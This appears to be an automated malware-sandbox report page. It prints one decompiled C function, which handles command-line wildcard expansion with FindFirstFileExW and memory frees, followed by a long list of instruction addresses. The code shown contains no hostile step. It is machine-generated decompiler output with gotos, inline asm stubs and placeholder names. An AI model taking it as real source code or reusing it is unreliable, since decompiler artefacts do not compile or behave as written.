                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 4ea5a6ea8b365c1ac0ddbcb19916b1d70510d0c28b2516e41782e01f19580b64
                                                                                                                                                                          • Instruction ID: d0b459ab0401698aacc29344033672d34dfd50568a415587f4e77ee372afd42f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea5a6ea8b365c1ac0ddbcb19916b1d70510d0c28b2516e41782e01f19580b64
                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF09677504608ABC630EFE8F5C2E0A73D9FA58311B544805F68DD7590CB32FC834654
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0B5A5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                          			E00A0B5A5(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E00A011D9(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00A1106E(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E009FCBFC();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00A04422(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E00A1106E(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E00A0BAD8(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00A0447F(_t300);
														_t302 = _v12;
													}
													E00A0447F(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E00A1106E(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E009FCBFC();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0xa44bac; // 0x96877b9b
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E00A11F80(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E00A008FB(_t244 - _t287 + 1, _t287,  &_v676, E00A0B2FA(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00A0B4D6( &(_v608.cFileName),  &_v640,  &_v609, E00A0B2FA(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E00A0447F(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E00A0447F(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E00A11A50(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00A0B4BE);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E00A0447F(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E009F8F7D(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E00A0447F(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E00A11F40(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E00A0447F( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E00A0447F(_t283);
						goto L31;
					}
				} else {
					_t219 = E009FEBAB(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E009FCBCF();
					L31:
					return _t297;
				}
				L81:
			}

















































































































                                                                                                                                                                          0x00a0b5aa
                                                                                                                                                                          0x00a0b5ad
                                                                                                                                                                          0x00a0b5b0
                                                                                                                                                                          0x00a0b5b1
                                                                                                                                                                          0x00a0b5b3
                                                                                                                                                                          0x00a0b5c9
                                                                                                                                                                          0x00a0b5cd
                                                                                                                                                                          0x00a0b5d0
                                                                                                                                                                          0x00a0b5d2
                                                                                                                                                                          0x00a0b5d4
                                                                                                                                                                          0x00a0b5d6
                                                                                                                                                                          0x00a0b5d8
                                                                                                                                                                          0x00a0b5db
                                                                                                                                                                          0x00a0b5de
                                                                                                                                                                          0x00a0b5e1
                                                                                                                                                                          0x00a0b5e3
                                                                                                                                                                          0x00a0b646
                                                                                                                                                                          0x00a0b648
                                                                                                                                                                          0x00a0b64b
                                                                                                                                                                          0x00a0b64d
                                                                                                                                                                          0x00a0b651
                                                                                                                                                                          0x00a0b65a
                                                                                                                                                                          0x00a0b65b
                                                                                                                                                                          0x00a0b65e
                                                                                                                                                                          0x00a0b660
                                                                                                                                                                          0x00a0b663
                                                                                                                                                                          0x00a0b667
                                                                                                                                                                          0x00a0b667
                                                                                                                                                                          0x00a0b669
                                                                                                                                                                          0x00a0b66b
                                                                                                                                                                          0x00a0b66d
                                                                                                                                                                          0x00a0b66f
                                                                                                                                                                          0x00a0b66f
                                                                                                                                                                          0x00a0b671
                                                                                                                                                                          0x00a0b674
                                                                                                                                                                          0x00a0b677
                                                                                                                                                                          0x00a0b677
                                                                                                                                                                          0x00a0b679
                                                                                                                                                                          0x00a0b67a
                                                                                                                                                                          0x00a0b67a
                                                                                                                                                                          0x00a0b685
                                                                                                                                                                          0x00a0b687
                                                                                                                                                                          0x00a0b68a
                                                                                                                                                                          0x00a0b68b
                                                                                                                                                                          0x00a0b68e
                                                                                                                                                                          0x00a0b68e
                                                                                                                                                                          0x00a0b692
                                                                                                                                                                          0x00a0b695
                                                                                                                                                                          0x00a0b698
                                                                                                                                                                          0x00a0b698
                                                                                                                                                                          0x00a0b698
                                                                                                                                                                          0x00a0b6a5
                                                                                                                                                                          0x00a0b6a7
                                                                                                                                                                          0x00a0b6aa
                                                                                                                                                                          0x00a0b6ac
                                                                                                                                                                          0x00a0b6c4
                                                                                                                                                                          0x00a0b6c7
                                                                                                                                                                          0x00a0b6ca
                                                                                                                                                                          0x00a0b6cc
                                                                                                                                                                          0x00a0b6cf
                                                                                                                                                                          0x00a0b6d1
                                                                                                                                                                          0x00a0b6d4
                                                                                                                                                                          0x00a0b6d7
                                                                                                                                                                          0x00a0b734
                                                                                                                                                                          0x00a0b737
                                                                                                                                                                          0x00a0b73a
                                                                                                                                                                          0x00a0b73c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b6d9
                                                                                                                                                                          0x00a0b6db
                                                                                                                                                                          0x00a0b6db
                                                                                                                                                                          0x00a0b6dd
                                                                                                                                                                          0x00a0b6e0
                                                                                                                                                                          0x00a0b6e0
                                                                                                                                                                          0x00a0b6e2
                                                                                                                                                                          0x00a0b6e4
                                                                                                                                                                          0x00a0b6ea
                                                                                                                                                                          0x00a0b6ed
                                                                                                                                                                          0x00a0b6ed
                                                                                                                                                                          0x00a0b6ef
                                                                                                                                                                          0x00a0b6f0
                                                                                                                                                                          0x00a0b6f0
                                                                                                                                                                          0x00a0b6f7
                                                                                                                                                                          0x00a0b6fa
                                                                                                                                                                          0x00a0b6fe
                                                                                                                                                                          0x00a0b70b
                                                                                                                                                                          0x00a0b710
                                                                                                                                                                          0x00a0b713
                                                                                                                                                                          0x00a0b715
                                                                                                                                                                          0x00a0b789
                                                                                                                                                                          0x00a0b78a
                                                                                                                                                                          0x00a0b78b
                                                                                                                                                                          0x00a0b78c
                                                                                                                                                                          0x00a0b78d
                                                                                                                                                                          0x00a0b78e
                                                                                                                                                                          0x00a0b793
                                                                                                                                                                          0x00a0b797
                                                                                                                                                                          0x00a0b799
                                                                                                                                                                          0x00a0b79a
                                                                                                                                                                          0x00a0b79d
                                                                                                                                                                          0x00a0b79d
                                                                                                                                                                          0x00a0b7a0
                                                                                                                                                                          0x00a0b7a0
                                                                                                                                                                          0x00a0b7a2
                                                                                                                                                                          0x00a0b7a3
                                                                                                                                                                          0x00a0b7a3
                                                                                                                                                                          0x00a0b7a7
                                                                                                                                                                          0x00a0b7a8
                                                                                                                                                                          0x00a0b7af
                                                                                                                                                                          0x00a0b7b2
                                                                                                                                                                          0x00a0b7b5
                                                                                                                                                                          0x00a0b7b7
                                                                                                                                                                          0x00a0b7bf
                                                                                                                                                                          0x00a0b7c0
                                                                                                                                                                          0x00a0b7c1
                                                                                                                                                                          0x00a0b7c4
                                                                                                                                                                          0x00a0b7ce
                                                                                                                                                                          0x00a0b7d2
                                                                                                                                                                          0x00a0b7d4
                                                                                                                                                                          0x00a0b7e8
                                                                                                                                                                          0x00a0b7e8
                                                                                                                                                                          0x00a0b7eb
                                                                                                                                                                          0x00a0b7f5
                                                                                                                                                                          0x00a0b7fa
                                                                                                                                                                          0x00a0b7fd
                                                                                                                                                                          0x00a0b7ff
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b801
                                                                                                                                                                          0x00a0b801
                                                                                                                                                                          0x00a0b806
                                                                                                                                                                          0x00a0b80d
                                                                                                                                                                          0x00a0b810
                                                                                                                                                                          0x00a0b812
                                                                                                                                                                          0x00a0b823
                                                                                                                                                                          0x00a0b825
                                                                                                                                                                          0x00a0b827
                                                                                                                                                                          0x00a0b827
                                                                                                                                                                          0x00a0b827
                                                                                                                                                                          0x00a0b814
                                                                                                                                                                          0x00a0b815
                                                                                                                                                                          0x00a0b81a
                                                                                                                                                                          0x00a0b81d
                                                                                                                                                                          0x00a0b82c
                                                                                                                                                                          0x00a0b832
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b835
                                                                                                                                                                          0x00a0b7d6
                                                                                                                                                                          0x00a0b7d6
                                                                                                                                                                          0x00a0b7dc
                                                                                                                                                                          0x00a0b7e1
                                                                                                                                                                          0x00a0b7e4
                                                                                                                                                                          0x00a0b7e6
                                                                                                                                                                          0x00a0b838
                                                                                                                                                                          0x00a0b83a
                                                                                                                                                                          0x00a0b83b
                                                                                                                                                                          0x00a0b83c
                                                                                                                                                                          0x00a0b83d
                                                                                                                                                                          0x00a0b83e
                                                                                                                                                                          0x00a0b83f
                                                                                                                                                                          0x00a0b844
                                                                                                                                                                          0x00a0b847
                                                                                                                                                                          0x00a0b848
                                                                                                                                                                          0x00a0b84a
                                                                                                                                                                          0x00a0b850
                                                                                                                                                                          0x00a0b857
                                                                                                                                                                          0x00a0b85a
                                                                                                                                                                          0x00a0b85d
                                                                                                                                                                          0x00a0b860
                                                                                                                                                                          0x00a0b861
                                                                                                                                                                          0x00a0b862
                                                                                                                                                                          0x00a0b865
                                                                                                                                                                          0x00a0b86b
                                                                                                                                                                          0x00a0b86d
                                                                                                                                                                          0x00a0b86f
                                                                                                                                                                          0x00a0b86f
                                                                                                                                                                          0x00a0b871
                                                                                                                                                                          0x00a0b873
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b875
                                                                                                                                                                          0x00a0b877
                                                                                                                                                                          0x00a0b879
                                                                                                                                                                          0x00a0b87b
                                                                                                                                                                          0x00a0b886
                                                                                                                                                                          0x00a0b888
                                                                                                                                                                          0x00a0b88a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b88a
                                                                                                                                                                          0x00a0b87b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b877
                                                                                                                                                                          0x00a0b88c
                                                                                                                                                                          0x00a0b88c
                                                                                                                                                                          0x00a0b892
                                                                                                                                                                          0x00a0b894
                                                                                                                                                                          0x00a0b89a
                                                                                                                                                                          0x00a0b89c
                                                                                                                                                                          0x00a0b8be
                                                                                                                                                                          0x00a0b8be
                                                                                                                                                                          0x00a0b8c0
                                                                                                                                                                          0x00a0b8c2
                                                                                                                                                                          0x00a0b8ce
                                                                                                                                                                          0x00a0b8ce
                                                                                                                                                                          0x00a0b8c4
                                                                                                                                                                          0x00a0b8c4
                                                                                                                                                                          0x00a0b8c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b8c8
                                                                                                                                                                          0x00a0b8c8
                                                                                                                                                                          0x00a0b8ca
                                                                                                                                                                          0x00a0b8cc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b8cc
                                                                                                                                                                          0x00a0b8c6
                                                                                                                                                                          0x00a0b8d6
                                                                                                                                                                          0x00a0b8de
                                                                                                                                                                          0x00a0b8e4
                                                                                                                                                                          0x00a0b8e5
                                                                                                                                                                          0x00a0b8e7
                                                                                                                                                                          0x00a0b8ef
                                                                                                                                                                          0x00a0b8f5
                                                                                                                                                                          0x00a0b8fb
                                                                                                                                                                          0x00a0b901
                                                                                                                                                                          0x00a0b915
                                                                                                                                                                          0x00a0b91a
                                                                                                                                                                          0x00a0b925
                                                                                                                                                                          0x00a0b935
                                                                                                                                                                          0x00a0b93b
                                                                                                                                                                          0x00a0b93d
                                                                                                                                                                          0x00a0b940
                                                                                                                                                                          0x00a0b963
                                                                                                                                                                          0x00a0b963
                                                                                                                                                                          0x00a0b968
                                                                                                                                                                          0x00a0b96e
                                                                                                                                                                          0x00a0b96e
                                                                                                                                                                          0x00a0b974
                                                                                                                                                                          0x00a0b97a
                                                                                                                                                                          0x00a0b980
                                                                                                                                                                          0x00a0b986
                                                                                                                                                                          0x00a0b98c
                                                                                                                                                                          0x00a0b9ad
                                                                                                                                                                          0x00a0b9b2
                                                                                                                                                                          0x00a0b9b7
                                                                                                                                                                          0x00a0b9bb
                                                                                                                                                                          0x00a0b9c1
                                                                                                                                                                          0x00a0b9c4
                                                                                                                                                                          0x00a0b9d7
                                                                                                                                                                          0x00a0b9d7
                                                                                                                                                                          0x00a0b9dd
                                                                                                                                                                          0x00a0b9e3
                                                                                                                                                                          0x00a0b9e4
                                                                                                                                                                          0x00a0b9e5
                                                                                                                                                                          0x00a0b9ea
                                                                                                                                                                          0x00a0b9ed
                                                                                                                                                                          0x00a0b9f3
                                                                                                                                                                          0x00a0b9f5
                                                                                                                                                                          0x00a0ba53
                                                                                                                                                                          0x00a0ba59
                                                                                                                                                                          0x00a0ba61
                                                                                                                                                                          0x00a0ba66
                                                                                                                                                                          0x00a0ba6c
                                                                                                                                                                          0x00a0ba6d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9c6
                                                                                                                                                                          0x00a0b9c6
                                                                                                                                                                          0x00a0b9c9
                                                                                                                                                                          0x00a0b9cb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9cd
                                                                                                                                                                          0x00a0b9cd
                                                                                                                                                                          0x00a0b9d0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9d2
                                                                                                                                                                          0x00a0b9d2
                                                                                                                                                                          0x00a0b9d5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9d5
                                                                                                                                                                          0x00a0b9d0
                                                                                                                                                                          0x00a0b9cb
                                                                                                                                                                          0x00a0ba6f
                                                                                                                                                                          0x00a0ba70
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9f7
                                                                                                                                                                          0x00a0b9f7
                                                                                                                                                                          0x00a0b9fd
                                                                                                                                                                          0x00a0ba05
                                                                                                                                                                          0x00a0ba0a
                                                                                                                                                                          0x00a0ba19
                                                                                                                                                                          0x00a0ba19
                                                                                                                                                                          0x00a0ba21
                                                                                                                                                                          0x00a0ba27
                                                                                                                                                                          0x00a0ba2d
                                                                                                                                                                          0x00a0ba34
                                                                                                                                                                          0x00a0ba37
                                                                                                                                                                          0x00a0ba39
                                                                                                                                                                          0x00a0ba49
                                                                                                                                                                          0x00a0ba4e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b942
                                                                                                                                                                          0x00a0b942
                                                                                                                                                                          0x00a0b948
                                                                                                                                                                          0x00a0b949
                                                                                                                                                                          0x00a0b94a
                                                                                                                                                                          0x00a0b94b
                                                                                                                                                                          0x00a0b953
                                                                                                                                                                          0x00a0b953
                                                                                                                                                                          0x00a0ba76
                                                                                                                                                                          0x00a0ba76
                                                                                                                                                                          0x00a0ba7d
                                                                                                                                                                          0x00a0ba7e
                                                                                                                                                                          0x00a0ba86
                                                                                                                                                                          0x00a0ba8b
                                                                                                                                                                          0x00a0ba8c
                                                                                                                                                                          0x00a0b89e
                                                                                                                                                                          0x00a0b89e
                                                                                                                                                                          0x00a0b8a1
                                                                                                                                                                          0x00a0b8a3
                                                                                                                                                                          0x00a0b8b8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b8a5
                                                                                                                                                                          0x00a0b8a5
                                                                                                                                                                          0x00a0b8a8
                                                                                                                                                                          0x00a0b8a9
                                                                                                                                                                          0x00a0b8aa
                                                                                                                                                                          0x00a0b8ab
                                                                                                                                                                          0x00a0b8b0
                                                                                                                                                                          0x00a0b8a3
                                                                                                                                                                          0x00a0ba91
                                                                                                                                                                          0x00a0ba92
                                                                                                                                                                          0x00a0ba94
                                                                                                                                                                          0x00a0ba9b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b7e6
                                                                                                                                                                          0x00a0b7b9
                                                                                                                                                                          0x00a0b7bb
                                                                                                                                                                          0x00a0b7bc
                                                                                                                                                                          0x00a0b7be
                                                                                                                                                                          0x00a0b7be
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b717
                                                                                                                                                                          0x00a0b717
                                                                                                                                                                          0x00a0b71d
                                                                                                                                                                          0x00a0b720
                                                                                                                                                                          0x00a0b723
                                                                                                                                                                          0x00a0b726
                                                                                                                                                                          0x00a0b729
                                                                                                                                                                          0x00a0b72c
                                                                                                                                                                          0x00a0b72f
                                                                                                                                                                          0x00a0b72f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b6e0
                                                                                                                                                                          0x00a0b6ae
                                                                                                                                                                          0x00a0b6ae
                                                                                                                                                                          0x00a0b6b1
                                                                                                                                                                          0x00a0b73e
                                                                                                                                                                          0x00a0b73f
                                                                                                                                                                          0x00a0b744
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b744
                                                                                                                                                                          0x00a0b5e5
                                                                                                                                                                          0x00a0b5e5
                                                                                                                                                                          0x00a0b5e8
                                                                                                                                                                          0x00a0b5f0
                                                                                                                                                                          0x00a0b5f3
                                                                                                                                                                          0x00a0b5fa
                                                                                                                                                                          0x00a0b5fc
                                                                                                                                                                          0x00a0b5fe
                                                                                                                                                                          0x00a0b619
                                                                                                                                                                          0x00a0b61a
                                                                                                                                                                          0x00a0b61b
                                                                                                                                                                          0x00a0b61c
                                                                                                                                                                          0x00a0b621
                                                                                                                                                                          0x00a0b624
                                                                                                                                                                          0x00a0b627
                                                                                                                                                                          0x00a0b600
                                                                                                                                                                          0x00a0b600
                                                                                                                                                                          0x00a0b603
                                                                                                                                                                          0x00a0b604
